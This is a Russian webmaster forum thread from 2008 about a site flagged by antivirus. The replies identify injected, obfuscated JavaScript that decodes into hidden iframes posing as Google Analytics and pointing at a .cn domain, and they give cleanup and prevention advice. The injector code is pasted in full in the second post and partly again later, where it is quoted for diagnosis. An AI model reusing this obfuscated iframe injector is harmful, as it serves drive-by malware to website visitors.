Помогите плз - Где Вирус на сайте и как его удалить ?

Тема в разделе "Веб-дизайн", создана пользователем NoNaMe_909, 23 июл 2008.

Статус темы:
Закрыта.
Модераторы: zek24
  1. NoNaMe_909

    NoNaMe_909 Постоялец

    Регистр.:
    10 мар 2008
    Сообщения:
    130
    Симпатии:
    2
    На сайте sl600.ru - у половины юзеров находится вирус, причём у одного знакомого НОД32 при открытии сайта закрыл ИЕ нафиг ....

    У меня НОД32 с обновами молчит, открывал через Оперу, Мозиллу и ИЕ, Каспервкий с другого компа тоже молчит, а у некоторых отображается вирус ...

    Вирус и раньше находился другими юзверями, но думал проблема в шабе, шаб поменял, проблема осталась, мож он на сервак попал ?
    Как решить проблему ?

    p.s заранее спасибо!
     
  2. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    Вот
    Код:
    <SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><!-- o --><SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='4863921057509781342676830415291306248957209356417856948307120567342189379816524026870194356870925143931542680706189427532489501673732895641024396185701728640539';var d='';for(var FEING481CaXRdOE23aSbNktV=0;FEING481CaXRdOE23aSbNktV<16;FEING481CaXRdOE23aSbNktV++) for(var znbEsrCBXKAwXtrzym6HSiDI5v6=0;znbEsrCBXKAwXtrzym6HSiDI5v6<10;znbEsrCBXKAwXtrzym6HSiDI5v6++) {d=iPI9xSxEXHYABrgdD.charCodeAt((parseInt(krUdSZLGlzdWzp.charAt(FEING481CaXRdOE23aSbNktV*10+znbEsrCBXKAwXtrzym6HSiDI5v6))*16)+FEING481CaXRdOE23aSbNktV); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;h4gU+=String.fromCharCode(d);}document.write(unescape(h4gU));</SCRIPT><!-- c --><SCRIPT>var kwyurHiR1NrMxo8yB='';var H0fcKDrfD2kR6um30jw3='e23n.ub502u%e2/z3%gr/3g52%t0e%s3P3/trr%6q2%2s%v%zp%tv%1%g%02n23eveube.10u23%q%R%%0gbpkS4%2r2z0Pn%Q2.vch230g2re32sf/aaqQ6j2v2o32rn%Nnmc22vІ%Rr2cyya32%QQ%rQ%0';var ihYH31AGhLyKfgZBHU34Okz='5124708396957438261064159308723542916870938240571697254608315061297483751094238691078234569102685734385710624946310579282035678149647913052878649350213507218469';var d='';for(var ctVDwuBRaG8=0;ctVDwuBRaG8<16;ctVDwuBRaG8++) for(var UwtHn=0;UwtHn<10;UwtHn++) {d=H0fcKDrfD2kR6um30jw3.charCodeAt((parseInt(ihYH31AGhLyKfgZBHU34Okz.charAt(ctVDwuBRaG8*10+UwtHn))*16)+ctVDwuBRaG8); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;kwyurHiR1NrMxo8yB+=String.fromCharCode(d);}document.write(unescape(kwyurHiR1NrMxo8yB));</SCRIPT>
    
    А если расшифровать, то у тебя там стоят два фрейма
     
    NoNaMe_909 нравится это.
  3. NoNaMe_909

    NoNaMe_909 Постоялец

    Регистр.:
    10 мар 2008
    Сообщения:
    130
    Симпатии:
    2
    Дык, ну это же Гугл Аналитикс ...

    как нод32 может его с виром попутать ?
     
  4. Kaimi

    Kaimi

    Регистр.:
    28 окт 2007
    Сообщения:
    257
    Симпатии:
    253
    Гугл аналитикс в домене cn ?)
     
  5. LZet

    LZet

    Регистр.:
    6 янв 2008
    Сообщения:
    163
    Симпатии:
    15
    Есть подобные траблы...

    Одно время была подобная трабла - с постоянством в 2-3 дня появлялась такая же ерунда. Заменялись все файлы index.*** на подобную муру.

    Потом как-то вроде пропало. Штурмовал нодом с последними обновами. Ничего серьезного не нашел, кроме как пары хактулз (вот теперь думаю....). Но нашествия прекратились.

    Как вообще от подобных "внедрений" защититься? Подскажите плиз...

    И если можно, то хотя бы кратенько обрисуйте принципы атаки и, желательно, чуть подробней защиты...

    Спасибо!
     
    NoNaMe_909 нравится это.
  6. NoNaMe_909

    NoNaMe_909 Постоялец

    Регистр.:
    10 мар 2008
    Сообщения:
    130
    Симпатии:
    2
    Какой cn ?

    Сайт на sl600.ru
     
  7. A6opureH

    A6opureH Писатель

    Регистр.:
    28 июн 2008
    Сообщения:
    6
    Симпатии:
    0
  8. RxB

    RxB

    Заблокирован
    Регистр.:
    16 июл 2007
    Сообщения:
    235
    Симпатии:
    51
    Да хоть на pp.net.com.edu.
    По порядку:
    1. На твоём сайте на станицах прописан iframe код, который замаскирован под код Google Analitics, Google Analitics врядли будет по адресу google.analizer.cn, да ещё и в шифрованном фрейме.
    P.S. Ты его ставил?
    2. Как защитится. Универсального способа защиты нет, потому что путей проникновения заразы два:
    1. С сервера. То есть через дырявые скрипты залили шел и теперь ifram-ят тебя. Меры борьбы - писать или использовать нормальные не дырявые скрипты.
    2. Удалённый. Скорее всего ты подцепил где-то трояна, который спёр у тебя сохранный в ftp - клиенте пароль, хотя не исключено что он мог его перехватить в момент залогинивания на ftp. Меры борьбы - поставить нормальный антивирус и фаервол, обязательно сменить настройки по умолчанию на более жестокие. В идеале поставить линукс и с него работать с сайтом.
    3. Как бороться.
    1. Проверить свой компьютер на вирусы, лучше даже несколькими антивирусами, например cureit-ом и авирой.
    2. Сменить пароль на фтп и почистить код индексных страниц на сайте от
    PHP:
    <SCRIPT>var h4gU='';var iPI9xSxEXHYABrgdD='z0cbvuS2v23%o2sRn%3ta%18q2r2b%3ee%/yy3Q%%s32zv3gbrc%2%2u0r%32%Q%rpk32u%t2e0%3r2Naeab232v2r2/%P2ut.qh12Qg2e2%%%e2n/cg4j2Q%qevn3pg.v.260%%0nQPrsf/nmr12g00%z%R0';var krUdSZLGlzdWzp='486392105750
    3. Чтобы этого не повторилось поставить себе линукс и\или работать с виртуальной машины с сайтом, виртуальную машину использовать ТОЛЬКО для работы с сайтом
    4. Никогда не сохранять пароли и постоянно их менять
     
    NoNaMe_909 нравится это.
  9. elchegevara

    elchegevara

    Регистр.:
    20 окт 2007
    Сообщения:
    221
    Симпатии:
    59
    Kaimi правду говорит, не зря же он столько рипов сделал )
    1.Удаляй код
    2.Меняй пароли
    3.Меняй антивирус
     
    NoNaMe_909 нравится это.
  10. cds

    cds Постоялец

    Регистр.:
    28 янв 2007
    Сообщения:
    90
    Симпатии:
    8
    3-е лишнее. Достаточно переустановить со свежево дистра

    Улыбнуло =)
     
    NoNaMe_909 нравится это.
Статус темы:
Закрыта.